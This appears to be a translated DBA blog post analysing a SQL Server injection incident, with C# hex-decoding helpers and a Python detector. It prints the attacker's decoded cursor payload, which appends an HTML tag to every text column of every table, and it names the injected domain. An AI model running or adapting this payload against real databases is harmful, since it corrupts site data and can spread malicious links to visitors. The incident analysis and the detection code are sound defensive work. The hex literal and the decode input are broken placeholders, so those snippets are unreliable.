Comments: Few people in China do this, but as a DBA you should consider these aspects, because SQL Server provides a powerful permission control mechanism; of course, the problem should also be addressed in the application itself. In this case, the attacker either operated directly on the server or the injection came in through a jump host.
Today a friend ran into a problem: the following statement had been executed against his SQL Server database:
DEcLaRe @ s vArChAr (8000) sEt @ s = merge eXeC (@ s )--
The 0x prefix shows that this is a hexadecimal-encoded SQL statement.
So I set about decoding it. The methods for encoding a string to hexadecimal and decoding it back are as follows:
The Code is as follows:
using System;

/// <summary>
/// Convert a string to a hexadecimal string
/// </summary>
/// <param name="s">The string to convert</param>
/// <param name="charset">Encoding, such as "UTF-8", "gb2312"</param>
/// <param name="fenge">Whether each byte is separated by a comma</param>
public static string ToHex(string s, string charset, bool fenge)
{
    if ((s.Length % 2) != 0)
    {
        s += " "; // pad with a space to an even number of characters
        // throw new ArgumentException("s is not valid chinese string!");
    }
    System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);
    byte[] bytes = chs.GetBytes(s);
    string str = "";
    for (int i = 0; i < bytes.Length; i++)
    {
        // Always emit two digits per byte; "{0:X}" would drop the leading zero
        // of values below 0x10 and UnHex could no longer split the string into bytes.
        str += string.Format("{0:X2}", bytes[i]);
        if (fenge && (i != bytes.Length - 1))
        {
            str += ",";
        }
    }
    return str.ToLower();
}

/// <summary>
/// Convert from a hexadecimal string back to a string in the given encoding
/// </summary>
/// <param name="hex">The hexadecimal string</param>
/// <param name="charset">Encoding, such as "UTF-8", "gb2312"</param>
public static string UnHex(string hex, string charset)
{
    if (hex == null)
        throw new ArgumentNullException("hex");
    // Strip separators added by ToHex or picked up by copy-and-paste
    hex = hex.Replace(",", "");
    hex = hex.Replace("\n", "");
    hex = hex.Replace("\\", "");
    hex = hex.Replace(" ", "");
    if (hex.Length % 2 != 0)
    {
        // An odd number of digits cannot be split into whole bytes
        throw new ArgumentException("hex is not a valid number!", "hex");
    }
    // Convert hex to a byte array: each two characters is one byte.
    byte[] bytes = new byte[hex.Length / 2];
    for (int i = 0; i < bytes.Length; i++)
    {
        try
        {
            bytes[i] = byte.Parse(hex.Substring(i * 2, 2),
                System.Globalization.NumberStyles.HexNumber);
        }
        catch
        {
            // Rethrow an exception with a custom message.
            throw new ArgumentException("hex is not a valid hex number!", "hex");
        }
    }
    System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);
    return chs.GetString(bytes);
}
The statement is then decoded with the following code:
private static void TestHexStringDecode()
{
    // The hex-encoded payload taken from the injected statement (without the 0x prefix)
    string oldSql = "success";
    // The payload had also been URL-encoded, so UrlDecode runs after the hex decode
    Console.Write(System.Web.HttpUtility.UrlDecode(UnHex(oldSql, "UTF-8").ToLower()));
}
This reveals the statement's original form.
The Code is as follows:
declare @t varchar(255), @c varchar(255)
declare table_cursor cursor for
    select a.name, b.name from sysobjects a, syscolumns b
    where a.id = b.id and a.xtype = 'U'
      and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
open table_cursor
fetch next from table_cursor into @t, @c
while (@@fetch_status = 0)
begin
    -- appends an HTML tag to every text column of every user table;
    -- the tag literal is shown here as a placeholder
    exec ('update [' + @t + '] set [' + @c + '] = rtrim(convert(varchar, [' + @c + '])) + ''<INJECTED_HTML_TAG>''')
    fetch next from table_cursor into @t, @c
end
close table_cursor
deallocate table_cursor
The domain injected into the data was a.ppmmoo.cn.
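As an added example (not code from the original post), here is a small Python checker that recognises the hex-wrapped DECLARE/SET/EXEC statement shown above, decodes the 0x literal the way UnHex plus UrlDecode does, and flags the fragments of the cursor-based mass UPDATE payload. The sample statement is constructed for this example, and the HTML tag literal inside it is a placeholder.

```python
import re
from urllib.parse import unquote

# Matches the obfuscated wrapper seen in the post, in any letter case:
#   DEcLaRe @s vArChAr(8000) sEt @s=0x4445... eXeC(@s)--
HEX_EXEC = re.compile(
    r"declare\s+@\w+\s+n?varchar\s*\(\s*\d+\s*\)\s*"
    r"set\s+@\w+\s*=\s*(?:cast\s*\(\s*)?0x([0-9a-f]+)"
    r".*?exec\s*\(\s*@\w+\s*\)",
    re.IGNORECASE | re.DOTALL)

# Fragments of the cursor-driven mass UPDATE that the post decodes.
INDICATORS = ("sysobjects", "syscolumns", "@@fetch_status",
              "exec('update", "rtrim(convert(varchar")

def decode_hex_sql(hex_digits: str) -> str:
    """Turn the 0x literal back into text, like the post's UnHex followed by UrlDecode."""
    raw = bytes.fromhex(hex_digits)
    # An NVARCHAR payload arrives as UTF-16LE: for ASCII text every odd byte is NUL.
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8", errors="replace")
    return unquote(text)  # the payload may also have been URL-encoded in transit

def analyze(statement: str) -> dict:
    """Report whether a statement uses the hex-wrapped EXEC and which payload markers it carries."""
    m = HEX_EXEC.search(statement)
    if not m:
        return {"hex_exec": False, "decoded": None, "indicators": ()}
    decoded = decode_hex_sql(m.group(1))
    low = decoded.lower()
    return {"hex_exec": True, "decoded": decoded,
            "indicators": tuple(i for i in INDICATORS if i in low)}

# Constructed sample: the cursor payload from the post, wrapped the way the attacker did.
# The HTML literal it appends to every text column is a placeholder here.
PAYLOAD = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
           "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='U' "
           "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
           "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
           "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<PLACEHOLDER_TAG>''') "
           "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor")
SAMPLE = "DEcLaRe @s vArChAr(8000) sEt @s=0x" + PAYLOAD.encode().hex() + " eXeC(@s)--"
BENIGN = "SELECT name FROM sysobjects WHERE xtype = 'U'"  # mentions a catalog table, but no hex wrapper

if __name__ == "__main__":
    for stmt in (SAMPLE, BENIGN):
        print(analyze(stmt))
```

The same check can be run over captured request parameters or SQL Server audit output; a statement that is flagged with several indicators deserves a look at the account's permissions, since the payload only works if the web application's login may UPDATE every user table.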
You should pay more attention to this kind of injection in day-to-day operation: restricting the permissions of the database account prevents code like the above from being injected. According to my friend, the attacker was injecting from a machine on a fiber-optic line, which was probably a compromised host being used as a zombie, or a server.
In addition, http://home2.paulschou.net/tools/xlate/ can be used to decode hex-encoded strings.